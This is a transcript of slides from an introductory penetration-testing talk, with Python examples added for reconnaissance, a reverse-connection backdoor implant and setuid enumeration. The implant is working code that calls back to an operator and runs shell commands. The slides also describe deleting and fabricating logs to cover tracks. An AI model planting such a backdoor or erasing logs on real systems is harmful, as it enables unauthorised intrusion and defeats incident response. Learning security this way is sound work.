Path of Cyber Security

Satria Ady Pradana
http://xathrya.id/

Transcript of Path of Cyber Security


Whoami?
• Satria Ady Pradana
– Teknik Informatika (Informatics Engineering), ITB, 2010
– Embedded Software Engineer
– DracOS Dev Team
– Interested in low-level stuff
– Contact me: [email protected]

Provided Material

• “Playground” VMs
– bWAPP
– A certain boot2root VM

Distributed for free; ask the organizers for a copy.

Lots of people want to be hackers.
You? Why? Are you sure?

So you wanna be a Hacker?


We Have So Many Colors
• White Hat
• Gray Hat
• Black Hat
• Red Hat
• Blue Hat
• Green Hat
• etc.

The Essence of Hacking

• Getting and using other people’s computers (without getting caught).
• Defeating protection to attain some goal.
• Exploiting something and gaining profit.
• Having fun.

But my talk won’t cover hacking as a crime.

Refine the word “hacker” to “security professional”.

We have two sides:
• Attacker
• Defender

Be Defender

• Know why you do this.
• Know how an attacker (might) attack.
• Know how to defend yourself, your assets, etc.
• Know what to do when something happens.
• Know why it ended up like this.

(If you are screwed, at least you know why.)

Be Attacker

• Know how the target is organized.
• Know how the target reacts to certain events.
• Have vast knowledge about the system.
• Know how to be “evil” (without necessarily being one).

But I bet you attended this meeting to become an attacker.

Hacking Steps

We call it penetration testing.
• Reconnaissance & Analysis
• Vulnerability Mapping
• Gaining Access
• Privilege Escalation
• Maintaining Access
• Covering Tracks

Stage 1: Reconnaissance

Gathering information: search for valuable information related to our target, then analyze it and extract knowledge where appropriate.
Basically:
• Footprinting
• OSINT (Open-Source INTelligence)

Your Goal!

• Obtain as much information as possible.

• Reconnaissance is about intelligence gathering.

• Gathering facts, inferring from them, and relating them back to the target.

• Information of direct or indirect relevance may help in later stages.

• The more useful information you get, the better your chance of compromising the target.

Footprinting
Gather information about the nodes, machines, systems and infrastructure in use. Grasp the environment before execution.

• Publicly exposed machines (which ones are reachable by us)

• Open ports (doors available for us to get in)

• Network (relation to other systems)

• Applications (ex: version)

• Server specifics (OS, kernel, important drivers, existing services, etc.)
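The "open ports" and "application version" items above are usually answered by the same probe: connect to a port and record the banner the service volunteers. The following is an added example written for this transcript, not a tool from the talk or the DracOS project. It starts a constructed fake SSH-like service on localhost (the banner text is sample data) so the scan runs offline; the fingerprint rules are the example's own simple heuristics.

```python
import socket
import threading

# Added example (not from the original slides): a tiny footprinting tool.
# Port scan + banner grab answers two of the slide's questions at once:
# "Open ports" (which doors are open) and "Applications (ex: version)".
# A fake SSH-like service is started on localhost so it runs offline;
# the banner text is constructed sample data.

def serve_banner(banner, host="127.0.0.1"):
    """Constructed target service: listen on an ephemeral port and send
    `banner` to every client, the way sshd/ftpd/smtpd greet before reading.
    Returns (port, server_socket); close the socket to stop it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # server socket closed: stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], srv


def grab_banner(host, port, timeout=1.0):
    """Connect to host:port. Returns (is_open, banner_text); the banner is
    whatever the service volunteers before we send anything (empty for
    protocols such as HTTP that wait for the client to speak first)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(256)
            except socket.timeout:
                data = b""
            return True, data.decode("ascii", "replace").strip()
    except OSError:              # refused, filtered (timeout) or unreachable
        return False, ""


def footprint(host, ports, timeout=1.0):
    """Scan `ports` on `host`; return {port: banner} for the open ones."""
    found = {}
    for port in ports:
        is_open, banner = grab_banner(host, port, timeout)
        if is_open:
            found[port] = banner
    return found


def fingerprint(banner):
    """Turn a banner into (product, version). Rules cover the SSH
    identification string (RFC 4253: 'SSH-2.0-<software>') and the
    '220 ...' greeting shared by FTP/SMTP; anything else is 'unknown'."""
    if banner.startswith("SSH-"):
        parts = banner.split("-", 2)           # ['SSH', '2.0', 'OpenSSH_7.4']
        if len(parts) == 3 and "_" in parts[2]:
            product, version = parts[2].split("_", 1)
            return product, version.split()[0]
        return "ssh", parts[-1]
    if banner.startswith("220 "):
        return "ftp-or-smtp", banner[4:]
    return "unknown", banner


def demo():
    """Spin up the constructed service, scan it plus a port chosen to be
    closed, and report what a recon stage would record."""
    open_port, srv = serve_banner(b"SSH-2.0-OpenSSH_7.4\r\n")
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]       # free now, nobody listening
    probe.close()
    try:
        found = footprint("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    report = {port: fingerprint(banner) for port, banner in found.items()}
    return {"open": found, "closed_port": closed_port, "fingerprints": report}


if __name__ == "__main__":
    print(demo())
```

Against a real target the same `footprint()` call is pointed at the host and a port list; the output row "22: OpenSSH 7.4" is exactly the "application version" fact the slide wants recorded for the vulnerability-mapping stage. Note that a timeout is reported as closed here; a filtered port (firewall drops) and a closed port (RST) look different on the wire, and a fuller scanner distinguishes them.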

OSINT

• Open-Source INTelligence
• Open = overt, publicly available sources
• Not about open-source software.

• Try googling yourself: did you find anything useful?

What Can You Get?

Now apply the same principle to a target in cyberspace.

Stage 2: Vulnerability Mapping

Mapping threats and potential breaches onto the information found.
• Based on the systems we found, what threats apply?
• How can we conduct an attack?
• Prioritize the list: decide which path gives the greater chance of success.

Simulate break-in scenarios before we get to the next stage.

Your Goal!

• Find possible paths to penetrate the target.
• Creating a threat model is helpful.

Stage 3: Gaining Access

The actual penetration phase. Our purpose is to break in, using the vulnerabilities found in the previous steps.

We might also discover more while we are at it; just add it to the list.

Your Goal!

• Break in / compromise.
• Create a connection (persistent / non-persistent) between the target and us. Mostly a reverse connection.
– Set up a listener to receive the callback.
– Plant a backdoor.
• Do something on the target.
– Ex: create a new user
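The listener/callback pair described above, as an added example written for this transcript (not code from the talk or the DracOS project). Both sides run in one process on localhost so it works offline: the implant (target side) connects out to the operator's listener, announces itself, executes one command and sends the output back. The framing (a check-in line, then a 4-byte length prefix on each reply) is this example's own choice, not a standard.

```python
import socket
import struct
import subprocess
import threading

# Added example, not from the original slides: the reverse-connection
# handshake the slide describes, with both sides in one process so it
# runs offline. The implant (target side) connects *out* to the operator's
# listener; outbound traffic is what most firewalls allow, which is why
# the slide says "mostly a reverse connection". Framing (check-in line,
# then length-prefixed replies) is this example's own choice, not a standard.

def start_listener(host="127.0.0.1"):
    """Operator side: bind an ephemeral port and wait for the callback.
    Returns (port, listening_socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    return srv.getsockname()[1], srv


def implant(host, port, max_commands=1):
    """Target side: connect back, announce the host name, then run each
    newline-terminated command through the shell and return its output
    as a 4-byte-length-prefixed frame. Stops after max_commands or 'exit'."""
    with socket.create_connection((host, port)) as s:
        s.sendall(b"checkin host=" + socket.gethostname().encode() + b"\n")
        reader = s.makefile("rb")
        for _ in range(max_commands):
            line = reader.readline()
            if not line or line.strip() == b"exit":
                break
            proc = subprocess.run(line.decode().strip(), shell=True,
                                  capture_output=True, text=True)
            payload = (proc.stdout + proc.stderr).encode()
            s.sendall(struct.pack("!I", len(payload)) + payload)


def operate(srv, command, timeout=10.0):
    """Operator side: accept one callback, read the check-in line, send a
    single command and return (checkin, output)."""
    srv.settimeout(timeout)
    conn, _ = srv.accept()
    with conn:
        conn.settimeout(timeout)
        reader = conn.makefile("rb")
        checkin = reader.readline().decode().strip()
        conn.sendall(command.encode() + b"\n")
        (length,) = struct.unpack("!I", reader.read(4))
        output = reader.read(length).decode()
    return checkin, output.strip()


def demo(command="echo callback-ok"):
    """Run listener and implant against each other on localhost."""
    port, srv = start_listener()
    worker = threading.Thread(target=implant, args=("127.0.0.1", port),
                              daemon=True)
    worker.start()
    try:
        return operate(srv, command)
    finally:
        srv.close()
        worker.join(timeout=5)


if __name__ == "__main__":
    print(demo("id"))
```

In a real engagement `implant()` is what gets planted on the target (the slide's "backdoor"), pointed at the operator's public address, and `start_listener()`/`operate()` run on the attacker's box; the check-in line is the first thing a defender can look for on the network egress.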

Stage 4: Privilege Escalation

When we break in, we might not have enough privilege to take over. Therefore we need to exploit something else to gain higher privilege.

Your Goal!

• Acquire the highest, or at least enough, privilege to do what you need.
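The slide does not say what that "something else" is; on Linux/Unix one of the first things to look for after landing an unprivileged shell is a setuid/setgid executable, since it runs with its owner's privileges (often root). The following is an added example written for this transcript, not a tool from the talk: it enumerates such binaries and filters out a known-benign baseline. The baseline set and the sample files it is run against are constructed assumptions for illustration.

```python
import os
import stat
import tempfile

# Added example, not from the original slides: enumerate setuid/setgid
# executables, a routine first step when looking for a local privilege
# escalation path on Linux/Unix after landing an unprivileged shell.
# Such a binary runs as its owner (often root); one that is writable,
# unexpected, or a known-vulnerable version is a candidate to exploit.
# The baseline set below is an illustrative assumption, not a full list.

BASELINE = {"passwd", "sudo", "su", "mount", "umount", "ping", "chsh",
            "chfn", "newgrp", "gpasswd", "pkexec"}


def is_setuid_exec(st):
    """True for a regular file that is executable and has SUID or SGID set."""
    mode = st.st_mode
    return (stat.S_ISREG(mode)
            and bool(mode & (stat.S_ISUID | stat.S_ISGID))
            and bool(mode & 0o111))


def find_setuid(roots):
    """Walk `roots` and return sorted (path, octal_mode, owner_uid) tuples
    for every setuid/setgid executable. lstat is used so symlinks are not
    followed; unreadable entries are skipped, as they would be for a
    low-privilege user."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if is_setuid_exec(st):
                    hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(hits)


def suspicious(hits, baseline=BASELINE):
    """Drop hits whose basename is in the known-benign baseline."""
    return [h for h in hits if os.path.basename(h[0]) not in baseline]


def demo():
    """Build a constructed directory tree: one unexpected setuid tool, one
    setuid file named like a benign baseline binary, one plain script,
    and one setuid-but-not-executable data file that must be ignored."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {
            "backup_helper": 0o4755,   # unexpected: should be reported
            "passwd": 0o4755,          # expected: filtered by baseline
            "notes.sh": 0o755,         # no SUID bit
            "config.dat": 0o4644,      # SUID but not executable
        }
        for name, mode in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho sample\n")
            os.chmod(path, mode)
        hits = find_setuid([tmp])
        return {
            "all": [os.path.basename(h[0]) for h in hits],
            "suspicious": [os.path.basename(h[0]) for h in suspicious(hits)],
            "modes": {os.path.basename(h[0]): h[1] for h in hits},
        }


if __name__ == "__main__":
    for path, mode, uid in find_setuid(["/usr/bin", "/bin", "/sbin", "/usr/sbin"]):
        print(mode, uid, path)
```

A name matching the baseline is only a weak filter (an attacker can name a backdoor `passwd` too), so on a real box the next checks are the owner, whether the file or its directory is writable, and the version of each hit.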

Stage 5: Maintaining Access

If we want to run a long campaign, we need to keep access to the compromised host available. Deploying malware is one of the preferred ways.

Your Goal!

• Keep access to yourself or your team.

Stage 6: Covering Tracks

Don’t leave any trace.
• Delete logs
• Fabricate logs (smarter, yet trickier)
• Create fake evidence (might be predefined)
– Memory and pool
– File

Bonus Stage

Basically, do your mission or fulfill the objective.
• Dump data
• Maintain persistent access
• Harvest credentials
• Pivoting
• Proxying
• Etc.

It looks interesting and amusing, so how can I become a hacker?

How Could I be the One?

Starting path:
• Networking
• Programming

Security is another application of computer science, with several extras.

A deep understanding of the subjects gives better results.

Extra communication skills are a plus.

Area of Expertise

Some of the fields (not all):
• Network Security
• Web Security
• Mobile Security
• IoT & Embedded System Security

Pick one and dive into it.

Exploits

• What is it?
• Why is it important?
• How do you develop one?

An exploit is specific to a certain product or family of products sharing the same / a similar vulnerability.

• Given code, find bugs.
• Given bugs, how do you coerce them into an exploit?
• Given an exploit, how do you deploy it?
• Given a pwned system, how do you hide yourself?

• Enough chat, give me demos!

Demo 1 (Web Security)

• Turn VirtualBox / VMware on!
• Use the bWAPP VM

Demo 2

• Certain boot2root VM

• Get the write-up on DracOS repository

Okay, so where can we REALLY start learning? (Assuming you want to be an expert.)

• Take a course in computer science (seriously)
• Participate in competitions
– CTF
– Wargames

• Create a practice lab

CTF

• A good environment to learn in.
• What a normal security professional would do day to day… on easy mode.

Competition (Recommended)

• IDSecconf CTF
• Cyber Defense Challenge
• Indonesia Cyber Army

Lab

Building a lab is tedious.

Try http://gauli.net/

Advanced Stuff

• Researching and discovering vulnerabilities
• Creating toolkits
• Building tradecraft
• Deploying “assets” in the wild
• Creating a forest to hide in
• etc.

Final advice

• Be evil!
• Have fun!

Questions?